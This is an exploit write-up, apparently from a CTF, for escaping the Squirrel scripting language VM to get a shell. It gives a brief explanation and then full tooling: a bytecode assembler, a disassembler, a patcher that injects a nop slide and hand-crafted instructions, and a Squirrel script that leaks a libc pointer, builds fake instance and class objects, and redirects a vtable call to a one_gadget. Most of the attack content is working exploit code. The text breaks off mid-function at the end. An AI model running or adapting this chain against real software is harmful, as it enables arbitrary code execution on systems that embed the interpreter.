I use a step size of 40 in my code, because I fucked up somewhere in the offset calculation and 40 seems to work for the Docker image.

By loading the code somewhere later into the stack and before that a big nop slide, code on the stack can be executed. So basically the classic jmp esp, but in squirrel. But how to get back? I ended up using traps, since they save the stack base and the instruction pointer location. On the stack all that is needed is to throw an exception to get back into a "normal" state.

How to shell

On Linux the system function is compiled into the binary even though it is not registered. I can't just use system("sh") in Squirrel, but if I create a native closure whose _function pointer points to _system_system, I can call that native closure to get a shell. I would need to leak a pointer into the sqstdlib library and could then calculate the address of _system_system based on the Docker setup. But I decided to try to exploit it without _system_system, since that would require "remote information", which I had avoided up to this point.
I decided that a libc leak would be okay, since libc-db can be used to identify the version and calculate the offset from it. I could also have used a pattern scan, in which case no offset would be needed, but I left implementing that as an exercise for the reader.

I ended up using the vtable of a fake blob instead of _function, since I can control the arguments of self->Write used in _stream_writen:

SQInteger _stream_writen(HSQUIRRELVM v)
{
    SETUP_STREAM(v);
    SQInteger format, ti;
    SQFloat tf;
    sq_getinteger(v, 3, &format);
    switch(format) {
    case 'l': {
        SQInteger i;
        sq_getinteger(v, 2, &ti);
        i = ti;
        self->Write(&i, sizeof(SQInteger));
              }
        break;
        [...]

That is perfect for a one_gadget; only a libc pointer leak is needed. By allocating a big chunk on the heap, a libc pointer is placed directly after the chunk and can therefore be leaked.
To create the fake blob I used a real blob, because it is easy to write data to it and the object address can be leaked using tostring. Using that address and the offset to the blob data, I can write a fake instance pointing to the fake blob and move it onto the Squirrel stack, in order to execute writen and spawn a shell.

Code

assembler:

import struct

from sqdef import *
from common import *

def parse_assembly(assembly):
    instructions = []
    for x in assembly.split("\n"):
        data = x.strip()
        if data and  data[0]!="#":
            data = data.split("a0:")
            op = data[0].strip()
            if op in name2op:
                op = name2op[op]
            else:
                print("UNKNOWN instruction: %s" %(op))
                return
            data = data[1].split("a1:")
            a0 = int(data[0].strip(),16)
            data = data[1].split("a2:")
            a1 = int(data[0].strip(),16)
            data = data[1].split("a3:")
            a2 = int(data[0].strip(),16)
            a3 = int(data[1].strip(),16)
            instructions.append(SQInstruction(op,a0,a1,a2,a3))
    return instructions

class SQFile:

    def __init__(self):
        self.data = bytearray()
        self.pos = 0

    def assemble(self,main,rawdata=bytearray(0)):
        self.write(b'\xFA\xFA')
        self.write(b'RIQS')
        self.write(struct.pack("I",1))
        self.write(struct.pack("I",8))
        self.write(struct.pack("I",4))
        self.write_function(main,data=rawdata)
        self.write(b'LIAT')


    def write_object(self,t,o):
        self.write(struct.pack("I",t))
        if t == tmap['OT_STRING']:
            self.write(struct.pack("Q",len(o)))
            if type(o) == str:
                self.write(o.encode())
            else:
                self.write(o)
        elif t == tmap['OT_INTEGER']:
            self.write(struct.pack("Q",o))
        elif t == tmap['OT_BOOL']:
            self.write(struct.pack("Q",1 if o else 0))
        elif t == tmap['OT_FLOAT']:
            # Serialize the float value itself (this writer class has no read()).
            self.write(struct.pack("f",o))

    def write_function(self,fun,data=bytearray(0)):
        self.write(b'TRAP')
        self.write_object(tmap['OT_STRING'],fun.sourcename)
        self.write_object(tmap['OT_STRING'],fun.function_name)
        self.write(b'TRAP')

        self.write(struct.pack("Q",len(fun.literals)))
        self.write(struct.pack("Q",len(fun.parameters)))
        self.write(struct.pack("Q",len(fun.outervalues)))
        self.write(struct.pack("Q",len(fun.localvarinfos)))
        self.write(struct.pack("Q",len(fun.lineinfos) //16 ))
        self.write(struct.pack("Q",len(fun.defaultparams)//8))
        self.write(struct.pack("Q",len(fun.instructions)+((len(data) // 8) + (1 if len(data) % 8 != 0 else 0))))
        self.write(struct.pack("Q",len(fun.functions)))
        self.write(b'TRAP')


        for x in fun.literals:
            self.write_object(x[0],x[1])

        self.write(b'TRAP')

        
        for x in fun.parameters:
            self.write_object(x[0],x[1])

        self.write(b'TRAP')


        for x in fun.outervalues:
            self.write(struct.pack("Q",x[0]))
            self.write_object(x[1],x[2])
            self.write_object(tmap['OT_STRING'],x[3])
        
        self.write(b'TRAP')

        for x in fun.localvarinfos:
            self.write_object(x[0][0],x[0][1])
            self.write(struct.pack("QQQ",x[1],x[2],x[3]))
        
        self.write(b'TRAP')

        self.write(fun.lineinfos)

        self.write(b'TRAP')

        self.write(fun.defaultparams)

        self.write(b'TRAP')

        for ins in fun.instructions:
            self.write(struct.pack("iBBBB",ins.arg1,ins.op,ins.arg0,ins.arg2,ins.arg3))
        
        # Pad the raw data with zero bytes up to the next multiple of 8, so it
        # fills exactly the extra instruction slots counted in the header above.
        self.write(bytes(data) + b'\x00' * (-len(data) % 8))

        self.write(b'TRAP')

        for x in fun.functions:
            self.write_function(x)
        
        self.write(struct.pack("q",fun.stack_size))
        self.write(struct.pack("B",1 if fun.is_generator else 0))
        self.write(struct.pack("Q",fun.var_params))

    def write1(self,val):
        self.pos+=1
        self.data+=val


    def write(self,data):
        self.pos+=len(data)
        self.data+= data 
    
if __name__ == "__main__":
    assembly="""
    LOADNULLS a0: 0x00 a1: 0x01 a2: 0x00 a3: 0x00
    LOADINT   a0: 0x01 a1: 0x41 a2: 0x00 a3: 0x00
    SETOUTER  a0: 0x01 a1: %x   a2: 0x01 a3: 0x00
    """%(-1)
    s = SQFile()
    t = tmap['OT_NATIVECLOSURE']
    main = SQFunction("h4x","name",var_params=1,stack_size=4,instructions=parse_assembly(assembly),literals=[])

    s.assemble(main)
    with open("test.cnut","wb") as f:
        f.write(s.data)

disassembler:

import struct

from sqdef import *
from common import *

class SQFile:

    def __init__(self, data):
        self.data = data
        self.pos = 0
        self.main = None

    def parse(self):
        magic = self.read(2)
        assert(magic == b'\xFA\xFA')
        head = self.read(4)
        assert(head == b'RIQS')
        [sz_sqchar] = struct.unpack("I", self.read(4))
        assert(sz_sqchar == 1)
        [sz_sqint] = struct.unpack("I", self.read(4))
        assert(sz_sqint == 8)
        [sz_sqfloat] = struct.unpack("I", self.read(4))
        assert(sz_sqfloat == 4)
        self.main = self.parse_function()
        tail = self.read(4)
        assert(tail == b'LIAT')

    def parse_object(self):
        [t] = struct.unpack("I", self.read(4))
        if t == tmap['OT_STRING']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,self.read(v).decode())
        elif t == tmap['OT_INTEGER']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,v)
        elif t == tmap['OT_BOOL']:
            [v] = struct.unpack("Q", self.read(8))
            return (t,v != 0)
        elif t == tmap['OT_FLOAT']:
            [v] = struct.unpack("f", self.read(4))
            return (t,v)
        elif t == tmap['OT_NULL']:
            return (t,None)

    def parse_function(self):
        part = self.read(4)
        assert(part == b'TRAP')
        sourcename = self.parse_object()[1]
        function_name = self.parse_object()[1]
        part = self.read(4)
        assert(part == b'TRAP')

        [n_literals] = struct.unpack("Q", self.read(8))
        [n_parameters] = struct.unpack("Q", self.read(8))
        [n_outervalues] = struct.unpack("Q", self.read(8))
        [n_localvarinfos] = struct.unpack("Q", self.read(8))
        [n_lineinfos] = struct.unpack("Q", self.read(8))
        [n_defaultparams] = struct.unpack("Q", self.read(8))
        [n_instructions] = struct.unpack("Q", self.read(8))
        [n_functions] = struct.unpack("Q", self.read(8))

        part = self.read(4)
        assert(part == b'TRAP')

        literals = []
        for _ in range(n_literals):
            literals.append(self.parse_object())

        part = self.read(4)
        assert(part == b'TRAP')

        parameters = []
        for _ in range(n_parameters):
            parameters.append(self.parse_object())

        part = self.read(4)
        assert(part == b'TRAP')

        outervalues = []
        for _ in range(n_outervalues):
            [t] = struct.unpack("Q", self.read(8))
            o = self.parse_object()
            name = self.parse_object()
            outervalues.append((name, o, t))

        part = self.read(4)
        assert(part == b'TRAP')

        localvarinfos = []
        for _ in range(n_localvarinfos):
            name = self.parse_object()
            [pos, start, end] = struct.unpack("QQQ", self.read(8*3))
            localvarinfos.append((name, pos, start, end))

        part = self.read(4)
        assert(part == b'TRAP')

        lineinfos = self.read(n_lineinfos*16)

        part = self.read(4)
        assert(part == b'TRAP')

        defaultparams = self.read(n_defaultparams*8)

        part = self.read(4)
        assert(part == b'TRAP')

        instructions = []
        for i in range(n_instructions):
            [arg1, op, arg0, arg2, arg3] = struct.unpack("iBBBB", self.read(8))
            ins = SQInstruction(op, arg0, arg1, arg2, arg3)
            instructions.append(ins)


        part = self.read(4)
        assert(part == b'TRAP')

        functions = []
        for _ in range(n_functions):
            functions.append(self.parse_function())

        [stack_size] = struct.unpack("Q", self.read(8))
        [is_generator] = struct.unpack("B", self.read(1))
        [var_params] = struct.unpack("Q", self.read(8))

        return SQFunction(sourcename,function_name,literals,parameters,outervalues,localvarinfos,lineinfos,defaultparams,instructions,functions,stack_size,is_generator,var_params)

    def read(self, n):
        b = self.pos+n
        data = self.data[self.pos:b]
        self.pos = b
        return data

    def __repr__(self):
        return "%r" % (self.main)

    


if __name__ == "__main__":
    with open("test.cnut", "rb") as f:
        data = f.read()

    f = SQFile(data)
    f.parse()
    print("%r" % (f))
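
The object layout that parse_object reads (a 4-byte type tag, then for strings an 8-byte length followed by the raw bytes) can be illustrated with a small round trip. This is only a sketch: write_string and read_string are hypothetical helpers that are not part of the tooling, the tag value is OT_STRING as computed in sqdef, and little-endian byte order is assumed (x86-64).

```python
import struct

# OT_STRING = _RT_STRING | SQOBJECT_REF_COUNTED, as defined in sqdef.
OT_STRING = 0x00000010 | 0x08000000

def write_string(s):
    """Hypothetical helper: serialize a string in the layout parse_object reads."""
    raw = s.encode()
    return struct.pack("<I", OT_STRING) + struct.pack("<Q", len(raw)) + raw

def read_string(buf, pos=0):
    """Hypothetical helper: inverse of write_string, returns (value, new_position)."""
    (tag,) = struct.unpack_from("<I", buf, pos)
    assert tag == OT_STRING
    (length,) = struct.unpack_from("<Q", buf, pos + 4)
    start = pos + 12  # 4-byte tag + 8-byte length
    return buf[start:start + length].decode(), start + length

blob = write_string("INJECT")
value, end = read_string(blob)
print(value, end)
```

Integers and booleans follow the same pattern with an 8-byte payload in place of the length-prefixed bytes.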

patcher:

import assembler as asm
import disassembler as dism
from sqdef import *
import struct
import os

DEBUG = True
step = 40

def get_fn(base,name):
    if base.function_name == name:
        return base
    for fn in base.functions:
        f = get_fn(fn,name)
        if f:
            return f
    return None

def r_apply(base,fn):
    fn(base)
    for f in base.functions:
        r_apply(f,fn)

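def split_injection(fn):
    # Split fn.instructions around the "INJECT"/"EJECT" string-literal markers.
    # Returns (before, after, between), or (None, None, None) if a marker is missing.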
    inj_idx = -1
    ej_idx = -1
    for idx, ins in enumerate(fn.instructions):
        if op2name[ins.op] == "LOAD":
            if fn.literals[ins.arg1] == (tmap['OT_STRING'], "INJECT"):
                inj_idx = idx
            elif fn.literals[ins.arg1] == (tmap['OT_STRING'], "EJECT"):
                ej_idx = idx
    if inj_idx == -1 or ej_idx == -1:
        return None, None, None
    return fn.instructions[:inj_idx],fn.instructions[ej_idx+1:], fn.instructions[inj_idx+1:ej_idx]

if __name__ == "__main__":
    os.system(r"./squirrel/bin/sq.exe -c -o test.cnut test.nut")
    
    with open("test.cnut","rb") as f:
        data = f.read()

    f = dism.SQFile(data)
    f.parse()

    stack_up = get_fn(f.main,"stack_up")
    if stack_up:
        print(stack_up)
        print("[*] patching stack_up function")
        #def fn(x):
        #    x.stack_size = -0xFFFFFFF
        #r_apply(f.main,fn)
        
        


    ip2st_fn = get_fn(f.main,"ip2st")
    if ip2st_fn:
        print("[*] patching ip2st function")
        before, after, between = split_injection(ip2st_fn)
        target = -1
        for ins in before:
            if op2name[ins.op] == "LOAD":
                target = ins.arg0
        if target == -1:
            print("[!] target not found")
            exit(1)
        search_offset = 0x400
        n = 8000//step
        ip2st_fn.literals=[(tmap['OT_INTEGER'],0x1337414243441337)]*step
        ip2st_fn.literals.append((tmap['OT_STRING'],"r"))
        ip2st_fn.literals.append((tmap['OT_STRING'],"cmp"))
        pre="""
        PUSHTRAP a0:0x00 a1:%x a2: 0x00 a3:0x00
        """%(n*2)
        before+=asm.parse_assembly(pre)
        if len(before)%2==1:
            before=asm.parse_assembly("LINE a0: 0x00 a1:0x00 a2:0x00 a3:0x00")+before
        assembly=""
        for x in range(n):
            assembly+="""
            NE          a0: %x a1:%x a2:%x   a3:0x00
            JZ          a0: %x a1:%x a2:0x00 a3:0x00
            """ % (target+1,search_offset+x*step,target,
                    target+1,-((search_offset+x*step)*2-step-(step+(n-x)*2 + len(before)))
                )
        ip2st_fn.instructions = before+asm.parse_assembly(assembly)+after
    
    load_opcodes_fn = get_fn(f.main,"load_opcodes")
    if load_opcodes_fn:
        print("[*] patching load_opcodes")
        slide = step*2
        before, after, between = split_injection(load_opcodes_fn)
        #NOP SLIDE
        load_opcodes_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        LOAD        a0: 0x01 a1: %x   a2:0x00 a3:0x00
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        MOVE        a0: 0x02 a1: 0x00 a2:0x00 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,idx+2,idx+2)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_fn.literals)-1)
            idx+=1
        
        load_opcodes_fn.instructions=before+asm.parse_assembly(assembly)+after


    load_opcodes_lit_fn = get_fn(f.main,"load_opcodes_lit")
    if load_opcodes_lit_fn:
        print("[*] patching load_opcodes_lit")

        slide = step*2
        before, after, between = split_injection(load_opcodes_lit_fn)
        #NOP SLIDE
        load_opcodes_lit_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_lit_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        LOAD        a0: 0x01 a1: %x   a2:0x00 a3:0x00
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        LOAD        a0: 0x02 a1: 0x00 a2:0x00 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,idx+2,idx+2)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_lit_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_lit_fn.literals)-1)
            idx+=1
        
        load_opcodes_lit_fn.instructions=before+asm.parse_assembly(assembly)+after


    load_opcodes_cmp_fn = get_fn(f.main,"load_opcodes_cmp")
    if load_opcodes_cmp_fn:
        print("[*] patching load_opcodes_cmp")
        slide = step*2

        before, after, between = split_injection(load_opcodes_cmp_fn)
        #NOP SLIDE
        load_opcodes_cmp_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_cmp_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        DLOAD       a0: 0x01 a1: %x   a2:0x03 a3:%x
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        GET         a0: 0x04 a1: 0x00 a2:0x03 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        EQ          a0: 0x02 a1: 0x00 a2:0x04 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,step+1,idx+3,idx+3)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_cmp_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_cmp_fn.literals)-1)
            idx+=1
        
        load_opcodes_cmp_fn.instructions=before+asm.parse_assembly(assembly)+after

    pwn_fn = get_fn(f.main,"pwn")
    if pwn_fn:
        print("[*] patching pwn")
        before, after, between = split_injection(pwn_fn)
        patch = []
        target = None
        for ins in between:
            if op2name[ins.op] == "PREPCALLK" and pwn_fn.literals[ins.arg1]== (tmap['OT_STRING'],'seek'):
                target = ins.arg0
            if op2name[ins.op] == "CALL" and target is not None and ins.arg1 == target:
                patch.extend(asm.parse_assembly("""
                MOVE    a0: %x a1: 0x02 a2:0x00 a3: 0x00
                """ % (ins.arg2)))
            patch.append(ins)
        pwn_fn.instructions = before+patch+after
        print(pwn_fn)

    f.main.sourcename="h4x"
    f.main.function_name = "squirrel slayer by localo"
    s = asm.SQFile()
    s.assemble(f.main,bytearray(0))
    with open("test.cnut","wb") as f:
        f.write(s.data)
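
The patcher hides instructions inside OT_INTEGER literals by packing the 8 instruction bytes into one 64-bit value. A minimal sketch of that packing and its inverse follows. The function names are hypothetical, and the field order (arg1, op, arg0, arg2, arg3) is taken from the "iBBBB" format used above, with little-endian byte order assumed.

```python
import struct

def instruction_to_int(op, arg0, arg1, arg2=0, arg3=0):
    """Hypothetical helper: pack one instruction into a 64-bit integer literal."""
    raw = struct.pack("<iBBBB", arg1, op, arg0, arg2, arg3)
    return int.from_bytes(raw, "little")

def int_to_instruction(value):
    """Hypothetical helper: recover (op, arg0, arg1, arg2, arg3) from the literal."""
    arg1, op, arg0, arg2, arg3 = struct.unpack("<iBBBB", value.to_bytes(8, "little"))
    return op, arg0, arg1, arg2, arg3

# LOADINT a0:0x03 a1:0x42 (opcode 0x02 according to name2op)
packed = instruction_to_int(0x02, 0x03, 0x42)
print(hex(packed))
print(int_to_instruction(packed))
```

Since arg1 is a signed 32-bit field, negative jump offsets survive the round trip as well.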
    

common:

from sqdef import *

class SQInstruction:

    def __init__(self, op, arg0, arg1, arg2, arg3=0):
        self.op = op
        self.arg0 = arg0
        self.arg1 = arg1
        self.arg2 = arg2
        self.arg3 = arg3

    def __repr__(self):
        if self.op in op2name:
            op_name = "%s" % op2name[self.op]
        else:
            op_name = "UNKNOWN_%d" % self.op
        return "%-20s a0: 0x%02x a1: %s0x%08x a2: 0x%02x a3: 0x%02x" % (op_name, self.arg0, "-" if self.arg1 <0 else " ",abs(self.arg1), self.arg2, self.arg3)


class SQFunction:

    def __init__(self, sourcename="h4x", function_name="h4x", literals=None, parameters=None, outervalues=None, localvarinfos=None, lineinfos=b'', defaultparams=b'', instructions=None, functions=None,stack_size=0x8,is_generator=False,var_params=1):
        # List arguments default to None so that instances never share one list object.
        self.sourcename = sourcename
        self.function_name = function_name
        self.literals = [] if literals is None else literals
        self.parameters = [] if parameters is None else parameters
        self.outervalues = [] if outervalues is None else outervalues
        self.localvarinfos = [] if localvarinfos is None else localvarinfos
        self.lineinfos = lineinfos
        self.defaultparams = defaultparams
        self.instructions = [] if instructions is None else instructions
        self.functions = [] if functions is None else functions
        self.stack_size = stack_size
        self.is_generator= is_generator
        self.var_params = var_params
        super().__init__()

    def __repr__(self):
        ret = "*********************************************************************\n"
        ret+=" - Function: %s\n" % (self.function_name)
        ret+="\n - Literals: \n"
        for idx,x in enumerate(self.literals):
            ret+= "[%03d] %r\n"%(idx,x[1])
        ret+="\n - Instructions: \n"
        for idx, x in enumerate(self.instructions):
            ret += "[%03d] %r\n"  %(idx+1,x)
        ret += "*********************************************************************\n"
        return ret

sqdef:

SQUIRREL_VERSION_NUMBER =  310

SQ_BYTECODE_STREAM_TAG = 0xFAFA
SQOBJECT_REF_COUNTED   = 0x08000000
SQOBJECT_NUMERIC       = 0x04000000
SQOBJECT_DELEGABLE     = 0x02000000
SQOBJECT_CANBEFALSE    = 0x01000000
SQ_MATCHTYPEMASKSTRING = (-99999)
_RT_MASK = 0x00FFFFFF
_RT_NULL           = 0x00000001
_RT_INTEGER        = 0x00000002
_RT_FLOAT          = 0x00000004
_RT_BOOL           = 0x00000008
_RT_STRING         = 0x00000010
_RT_TABLE          = 0x00000020
_RT_ARRAY          = 0x00000040
_RT_USERDATA       = 0x00000080
_RT_CLOSURE        = 0x00000100
_RT_NATIVECLOSURE  = 0x00000200
_RT_GENERATOR      = 0x00000400
_RT_USERPOINTER    = 0x00000800
_RT_THREAD         = 0x00001000
_RT_FUNCPROTO      = 0x00002000
_RT_CLASS          = 0x00004000
_RT_INSTANCE       = 0x00008000
_RT_WEAKREF        = 0x00010000
_RT_OUTER          = 0x00020000

tmap={
    'OT_NULL' :          _RT_NULL|SQOBJECT_CANBEFALSE,
    'OT_INTEGER' :       _RT_INTEGER|SQOBJECT_NUMERIC|SQOBJECT_CANBEFALSE,
    'OT_FLOAT' :         _RT_FLOAT|SQOBJECT_NUMERIC|SQOBJECT_CANBEFALSE,
    'OT_BOOL' :          _RT_BOOL|SQOBJECT_CANBEFALSE,
    'OT_STRING' :        _RT_STRING|SQOBJECT_REF_COUNTED,
    'OT_TABLE' :         _RT_TABLE|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_ARRAY' :         _RT_ARRAY|SQOBJECT_REF_COUNTED,
    'OT_USERDATA' :      _RT_USERDATA|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_CLOSURE' :       _RT_CLOSURE|SQOBJECT_REF_COUNTED,
    'OT_NATIVECLOSURE' : _RT_NATIVECLOSURE|SQOBJECT_REF_COUNTED,
    'OT_GENERATOR' :     _RT_GENERATOR|SQOBJECT_REF_COUNTED,
    'OT_USERPOINTER' :   _RT_USERPOINTER,
    'OT_THREAD' :        _RT_THREAD|SQOBJECT_REF_COUNTED,
    'OT_FUNCPROTO' :     _RT_FUNCPROTO|SQOBJECT_REF_COUNTED,
    'OT_CLASS' :         _RT_CLASS|SQOBJECT_REF_COUNTED,
    'OT_INSTANCE' :      _RT_INSTANCE|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_WEAKREF' :       _RT_WEAKREF|SQOBJECT_REF_COUNTED,
    'OT_OUTER' :         _RT_OUTER|SQOBJECT_REF_COUNTED,
}

name2op={
'LINE':               0x00,
'LOAD':               0x01,
'LOADINT':            0x02,
'LOADFLOAT':          0x03,
'DLOAD':              0x04,
'TAILCALL':           0x05,
'CALL':               0x06,
'PREPCALL':           0x07,
'PREPCALLK':          0x08,
'GETK':               0x09,
'MOVE':               0x0A,
'NEWSLOT':            0x0B,
'DELETE':             0x0C,
'SET':                0x0D,
'GET':                0x0E,
'EQ':                 0x0F,
'NE':                 0x10,
'ADD':                0x11,
'SUB':                0x12,
'MUL':                0x13,
'DIV':                0x14,
'MOD':                0x15,
'BITW':               0x16,
'RETURN':             0x17,
'LOADNULLS':          0x18,
'LOADROOT':           0x19,
'LOADBOOL':           0x1A,
'DMOVE':              0x1B,
'JMP':                0x1C,
'JCMP':               0x1D,
'JZ':                 0x1E,
'SETOUTER':           0x1F,
'GETOUTER':           0x20,
'NEWOBJ':             0x21,
'APPENDARRAY':        0x22,
'COMPARITH':          0x23,
'INC':                0x24,
'INCL':               0x25,
'PINC':               0x26,
'PINCL':              0x27,
'CMP':                0x28,
'EXISTS':             0x29,
'INSTANCEOF':         0x2A,
'AND':                0x2B,
'OR':                 0x2C,
'NEG':                0x2D,
'NOT':                0x2E,
'BWNOT':              0x2F,
'CLOSURE':            0x30,
'YIELD':              0x31,
'RESUME':             0x32,
'FOREACH':            0x33,
'POSTFOREACH':        0x34,
'CLONE':              0x35,
'TYPEOF':             0x36,
'PUSHTRAP':           0x37,
'POPTRAP':            0x38,
'THROW':              0x39,
'NEWSLOTA':           0x3A,
'GETBASE':            0x3B,
'CLOSE':              0x3C,
}
op2name = {v: k for k, v in name2op.items()}
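
Because op2name is built by inverting name2op, two names that share an opcode value would silently overwrite each other in the reverse table. A quick sanity check for that can be sketched as follows. find_opcode_collisions is a hypothetical helper and the sample table is made up for illustration; it is not the real opcode list.

```python
from collections import defaultdict

def find_opcode_collisions(table):
    """Return {opcode: [names...]} for every opcode value used more than once."""
    by_value = defaultdict(list)
    for name, value in table.items():
        by_value[value].append(name)
    return {v: names for v, names in by_value.items() if len(names) > 1}

# Hypothetical miniature table, only to demonstrate the check.
sample = {"LOAD": 0x01, "LOADINT": 0x02, "ALIAS": 0x02, "MOVE": 0x0A}
collisions = find_opcode_collisions(sample)
print(collisions)
```

Running the same check on name2op before building op2name should return an empty dict.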

template:

function get_addy(obj){
    local l = tostring.pcall(obj)
    local idx = l.find("0x")
    while(idx>=0){
        l = l.slice(idx+2)
        idx = l.find("0x")
    }
    return l.slice(0,-1).tointeger(16)
}

function ip2st(){
    local a = 0x1337414243441337
    "INJECT"
    "EJECT"
    return a
}

function load_opcodes(){
    "INJECT"
    "EJECT"
    ip2st()
}

function load_opcodes_cmp(){
    "INJECT"
    "EJECT"
    ip2st()
}

function map_offset(a = 0x4343434343434343){

}
::base_addr <- get_addy(map_offset)
print(format("[*] base: 0x%016x\n",::base_addr))
local offset = 0
::cmp <- 0x4343434343434343
for(local i = 400; i< 8*1024; i+=1){
    ::r <- i
    load_opcodes_cmp()
    if(::r){
        print(i+" Found\n");
        offset = (i+0x1)
        break
    }
}

print(format("[*] base_offset: 0x%016x\n",offset))

::r<-offset


load_opcodes()

::base_offset<-(offset-8)
function addr2offset(addr){
    local o = (addr-::base_addr)>>4
    return (o + ::base_offset)& 0xFFFFFFFF
}

function offset2addr(offset){
    local o = (offset-::base_offset)<<4
    return (o + ::base_addr)
}

function pwn(err){
    local a = ::r
    local b = blob(4)
    "INJECT"
    b.writen(0x00,'i')
    "EJECT"
    print(a)
}

local b = blob(1024) #set main_arena pointer
b.writen(0x05000002,'i')
b.writen(0x00,'i')
b.writen(0x4142434445464748,'l')
b.writen(0x05000002,'i')
b.writen(0x00,'i')
b.writen(0x4141414141414141,'l')

::cmp <- 0x4142434445464748
for(local i = 400; i< 8*1024; i+=1){
    ::r <- i
    load_opcodes_cmp()
    if(::r){
        print(i+" Found\n");
        offset = (i+0x2)
        break
    }
}

local add = offset2addr(offset)
print(format("[*] blob is at 0x%016x\n", add))

#fake native instance
b.writen(0xa008000,'i')
b.writen(0x00,'i')
b.writen(add+0x10*3,'l')

::r<-addr2offset(add+1024-0x10)
load_opcodes()

local l_main = get_addy(::r)
local l_offset = 0x1eb080
local oneg_offset = 0xe6b99
print(format("[*] libc_main_arena leak: 0x%016x\n", l_main))
if(l_offset!=0x00){
    print(format("[*] libc base: 0x%016x\n",l_main-l_offset))
    #fake instance
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #uiref
    b.writen(0x0,'l') #weakref
    b.writen(0x0,'l') #_next
    b.writen(0x0,'l') #_prev
    b.writen(0x0,'l') #_sharedstate
    b.writen(0x0,'l') #_delegate
    b.writen(add+0x10*3+0x8*13,'l') #_class
    b.writen(add+0x10*3+0x8*13,'l') #_userpointer
    b.writen(0x0,'l') #_hook
    b.writen(0x0,'l') #_memsize
    b.writen(0x0,'l') #_values[0].type
    b.writen(0x0,'l') #_values[0].val

    #fake blob _class
    b.writen(add+0x10*3+0x8*(13+21+0x12*2)-0x40,'l') #vptr
    b.writen(0x0,'l') #uiref
    b.writen(0x0,'l') #weakref
    b.writen(0x0,'l') #_next
    b.writen(0x0,'l') #_prev
    b.writen(0x0,'l') #_sharedstate
    b.writen(0x0,'l') #_members
    b.writen(0x0,'l') #_base
    b.writen(0x0,'l') #_default_values._vals
    b.writen(0x0,'l') #_default_values._size
    b.writen(0x0,'l') #_default_values._allocated
    b.writen(0x0,'l') #_methods._vals
    b.writen(0x0,'l') #_methods._size
    b.writen(0x0,'l') #_methods._allocated
    for(local i = 0; i<0x12;i+=1){
        b.writen(0x0,'l') #_metamethods.type
        b.writen(0x0,'l') #_metamethods.val
    }
    b.writen(0x0,'l') #_attributes.type
    b.writen(0x0,'l') #_attributes.val
    b.writen(0x0000000080000000,'l') #_typetag
    b.writen(0x0,'l') #_hook
    b.writen(0x0,'l') #_locked
    b.writen(0x0,'l') #_constructoridx
    b.writen(0x0,'l') #_udsize
    b.writen(l_main-l_offset+oneg_offset,'l')

    ::r<-addr2offset(add-0x30)
    load_opcodes()
    pwn(b)
}else{
    print("[!] libc offset is not set...\n")
}
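
The addr2offset and offset2addr helpers in the template convert between absolute addresses and 16-byte slot indices relative to a leaked base. The same arithmetic, sketched in Python for experimenting outside the VM: the base values below are hypothetical placeholders, and the 32-bit mask presumably reflects that the index ends up in the 32-bit arg1 field of an instruction.

```python
SLOT_SHIFT = 4  # 16-byte slots, matching the >>4 and <<4 in the template

def addr2offset(addr, base_addr, base_offset):
    """Address -> slot index, truncated to 32 bits like the template version."""
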